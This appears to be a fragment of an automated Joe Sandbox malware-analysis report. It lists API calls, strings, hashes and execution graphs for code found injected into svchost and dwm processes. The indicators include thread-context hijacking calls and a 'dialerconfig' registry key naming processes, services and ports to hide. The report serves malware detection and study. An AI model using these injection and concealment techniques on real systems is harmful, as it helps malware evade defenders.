                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: c6c76a540a17df33cf6b33b62d86c749f28f34716d9120ac06b738ee0068be7b
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 5751F433941382CAEB748F62DA40BDA77E9F356B84F184115EE4A47BE5CBB8C490C701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 44bf977dff1b5ec5671c769ff3bcf65ab199377a69307d9c1e4287435c2f443d
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: A051B872101380CAEBB48F25DA44BDDB7ECF356B89F146115DA5A47BE5CBB4D690C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 1999b6c2b026b6124529a4adba9e946b963ca658d3889168c5ba82a1dd7089a5
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: C351AF33A426029AEB14CF15EA54F9937D9F352FE8F558124DA17437A8EBB8D840C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 3dc8e3defbb4cae5588ebab0199bf55474b8a63869ade0abb043a486d88ee41a
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: D6318A32A4264196E7149F11EA44B9937E8F742FE8F158014AE9B437A4DBBCD940CB04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 3f00fd9f30143d8ec0dc68171cd42f49f7c9ce272e972ea8ec581adce4c9e820
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: C9D10372B24A8089E751CFB9D6407DC3BF9F3547A8F244216CE5E97BA9EA74C506C340
APIs
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
• Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
• Instruction ID: b82fb3b3cd8c279cf6941b9ee5c2e82ae40e5202c2e4416826012ed8ae3623a2
• Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
• Instruction Fuzzy Hash: F00188B2620B90C6EB85DF62FE0469E67E8F789F91F144028EA4E4372ADE78C050C740

APIs
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
• Instruction ID: 667ac3d07cb23805d030a7f0e5a818e80c7b8aff588618ff8d56236ba759a437
• Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
• Instruction Fuzzy Hash: 3991E472B20A5085FBA1DF75DA40BED3BE9B744BA8F244109DE0B676A5DBB4C482C700

APIs
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction ID: 352795bb2acd6d720caa6935447fbf89c0e2d7ba74be2edce17ed9c1fa8f5351
• Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction Fuzzy Hash: C9113032720F0589EF40CF60ED557E833A8F759768F441E25DA6E467A5DFB8C1988380

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction ID: 3de46b81bbb003b110b723b7cc6fb6e414f3f1eb92d30ba74537780c1b1e2005
• Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction Fuzzy Hash: CB71B13620178186EBF49F25EE44BEA67DCF38AB84F542026DD0B53BA9DEB5C6458700

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction ID: 4f5b99736065405e28801979f0886448ceaedeffcf3269bf2fc32525654e0c9f
• Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction Fuzzy Hash: 99615633A02B858AEB20DF65D980BDD77B4F349B98F044215EF4A17BA8DBB8D195C740

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction ID: 47ea13e0a66e27f5222f985dc41e25c44af3528301242c2dfdf270eb08d24527
• Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction Fuzzy Hash: DE51183220638181E6B5CF29AA58BFA67DEF387790F442125DD9B03BB9CAB9C504C740

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
• Instruction ID: be8df8e1ec03d45ea558a2a3d3bbf99ec2db0f2b8a5c9b0990fe4d8467a9cadd
• Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
• Instruction Fuzzy Hash: 6141B373325A8086DBA0CF25E9447EA77E8F7987A4F504021EE4E877A4EBBCC541C740

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction ID: bb5eac71964d237cb1956cfb5dc8ea3c9076102839b00be22b734880a363d7cf
• Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction Fuzzy Hash: AC116D32215B8082EBA08F15F94079977E8F788B94F185220EECE47B69DF7CC551CB00

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: ierarchy Descriptor'$riptor at (
• API String ID: 592178966-758928094
• Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
• Instruction ID: b5321504703d7e0147251d0ef98098a33f2915f118edd02a8ea012e53d6d95a0
• Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
• Instruction Fuzzy Hash: CBE08671A81B4690DF028F62E9406D833E4EB58B64B989122995D46321FA7CD5E9C700

APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: 87559b647f718a4499c20e0080e905f3e2ba32fd32d78ccb03bd9a23e031c331
• Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction Fuzzy Hash: 14E08672A41B4580DF028F61E9405D873A4F758B64B989122C95D46321EA7CD5E5C300

APIs
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 80f4dcfa44d35f3495c169fc2734898f5281015fff2d1e20470a50a81ec8734b
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: 69118235612B4481EA89DB66AA04AA973E9F789FD0F185028DE4E47776DFB8C442C300

APIs
Memory Dump Source
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: 8abaebeb9784320d361adda1798bbe6ec81508ad70680dff6d03265ff0a18030
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: D3E039B562170486EB458B62F90878A36E5FB89B26F148028890A07362DFBD8499C750

Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 95%
Signature Coverage: 0%
Total number of Nodes: 120
Total number of Limit Nodes: 16
execution_graph (rendered graph; node/edge list omitted): entry nodes at 283e0f428c8, 283e0f43ab9, 283e0f1273c, 283e0f45cf0, 283e0f41abc and 283e0f4554d; API calls reached in the graph: StrCmpNIW, VirtualQuery, VirtualAlloc, GetLastError, LoadLibraryA, SetThreadContext, VirtualProtect, FlushInstructionCache, GetCurrentProcess, ResumeThread, VirtualFree, IsProcessorFeaturePresent, RtlLookupFunctionEntry, GetProcessHeap, HeapAlloc, HeapFree, Sleep, SleepEx, StrCmpIW, StrCmpW, RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, lstrlenW, StrCpyW

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: a5ca2d59cd59f8e582a86069b6c0422498232920e3b59dff40cf708cd0215b07
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: A9712E3A316A1186EF20DF65E8686593764FF84F98F409131DD4E47B69EF38CA66C340

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: d50538e1b7efed74cc2e06f4c0201756d72878e9e0accb22fe10cfe9aeb6aae8
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: 40115E3A70AB4183EF54DB61E428269A6A0FB48F95F448039DE9907794EF3DCA16C704

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph; basic-block list omitted): function entry at 283e0f45b30, blocks up to 283e0f45fc6; API calls in the graph: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread
APIs
Memory Dump Source
• Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
• Instruction ID: 978b1b2165db2147f18f165d684c3aab6251e4cf4322cfd67d1f96384ea11c97
• Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
• Instruction Fuzzy Hash: 5FD1AD7A20AB8881DA70DB56E4A435A77A0F7C8F85F144126EECD47BA5DF3CC652CB40

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph; basic-block list omitted): function entry at 283e0f450d0, blocks up to 283e0f456da; API calls in the graph: GetCurrentThreadId, VirtualProtect, GetLastError
APIs
Memory Dump Source
• Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
• Instruction ID: dc498c83d674fe2880933a75a832fcd50fd79594bc90b361b1ece1c4f703afdd
• Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                      • Instruction Fuzzy Hash: 2A02E93661EB8486EB60DB55F4A435AB7A0F7C4B84F104025EE8E87BA9DF7CC595CB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocQuery
                                                                      • String ID:
                                                                      • API String ID: 31662377-0
                                                                      • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction ID: 599be039a61133beec046f9d4de96158a5cae83d348939f95c0d2c0bed209933
                                                                      • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction Fuzzy Hash: 6131283921FA8481EA30DB15E06935E66A0FB84F84F108535FECD46798DF7CC7A28B04

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 23eeb1e90ca0b909da206c4682b0fbc9afc4c2a49a857e9a89fda45fbc286550
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: A9115B79A1A64282FB60DB61F83D36922A4BF54F45F50C134AD5682591EF7CC7768340

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 3733156554-0
                                                                      • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                      • Instruction ID: 7d4d528eda31144e0ca2cfab9647e4bf8748e64f9f138f1bf7edab6c572f20e4
                                                                      • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                      • Instruction Fuzzy Hash: 1CF0303A61EB04C0D630DB41E46435A6BA0F788FD4F148121FE8D43B69CE3CC7A28B40

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLibraryLoadVirtual
                                                                      • String ID:
                                                                      • API String ID: 3550616410-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: fc8f6cbc34088f36d80d8f67faccd3d2991b6f772c67a401c01523ada7272f5c
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: 5761EE3AB0269487DA94CF59D02876DB392FB64BA4F98C1318E590378ADE38D973D700

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00000283E0F41628: GetProcessHeap.KERNEL32 ref: 00000283E0F41633
                                                                        • Part of subcall function 00000283E0F41628: HeapAlloc.KERNEL32 ref: 00000283E0F41642
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F416B2
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F416DF
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F416F9
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41719
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F41734
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41754
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F4176F
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F4178F
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F417AA
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F417CA
                                                                      • Sleep.KERNEL32 ref: 00000283E0F41AD7
                                                                      • SleepEx.KERNELBASE ref: 00000283E0F41ADD
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F417E5
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41805
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F41820
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41840
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F4185B
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F4187B
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F41896
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F418A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 5f1fe751c3c7d6914186e55048bddc494c29ddcbe7712ac7e3c90fed6815364c
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: CA31BB7921AA4541FB50DB26EA693A923A5FF84FD0F08D5319E0987695EF34CA738310

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: ebde10bc148da114d0e47b14f842ab83ffc7a893d7e46ad2df1e8aab44caf887
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 34B1A33A216A5182EBA4CF25D46876D73A5FF64F94F849036EE0953B94DF34CEA2C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: ce3dc0326ecd335a8d5013b0e8f71581567297813b3872f98fb1a08bb360b8ed
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 38315E76606B8089EB60DF60E8943ED7360FB84B44F448039DE4D57B94EF38CA59C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 3c1ca2c093e900777f04ca1bc539dd5001c44a41ac4037ad274e2e37fb5abaa3
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: FB31953A215F8086EB60CF65E8543AE73A0FB89B54F504135EE9D43B54DF38C666CB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
